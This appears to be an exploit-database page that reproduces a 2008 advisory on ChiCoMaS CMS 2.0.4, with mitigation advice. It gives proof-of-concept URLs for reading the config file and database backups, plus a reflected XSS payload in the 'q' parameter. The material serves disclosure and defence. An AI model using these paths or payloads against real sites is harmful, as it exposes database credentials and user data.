header-logo
Suggest Exploit
vendor:
ChiCoMaS
by:
AmnPardaz Security Research & Penetration Testing Group
7.5
CVSS
HIGH
Database Information Disclosure, Authorization Weakness, XSS
N/A
CWE
Product Name: ChiCoMaS
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Browser
2008

chicomas <=2.0.4 Multiple Vulnerabilities

ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor, File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro. Database Information Disclosure can be exploited by accessing http://[URL]/chicomas/config.inc. The Latest generated Database backups can be accessed by http://[URL]/chicomas/backup. Cross Site Scripting (XSS) can be exploited by Reflected XSS attack in 'index.php' in 'q' parameter by accessing http://[URL]/chicomas/index.php?q='<script>alert(/www.BugReport.ir/.source)</script>'

Mitigation:

Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.
Source

Exploit-DB raw data:

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title:  chicomas <=2.0.4 Multiple Vulnerabilities
# Vendor: http://www.chicomas.com/
# Demo:   http://demo.opensourcecms.com/chicomas
# Bug:    Database Information Disclosure, Authorization Weakness, XSS
# Vulnerable Version: 2.0.4
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_59.htm
###################################################################


####################
- Description:
####################

  ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor,
File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro.

####################
- Vulnerability:
####################

+-->Dtabase Information Disclosure

POC: http://[URL]/chicomas/config.inc


+-->The Latest generated Database backups

POC: http://[URL]/chicomas/backup


+-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter.

POC: http://[URL]/chicomas/index.php?q="<script>alert(/www.BugReport.ir/.source)</script>

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

# milw0rm.com [2008-12-21]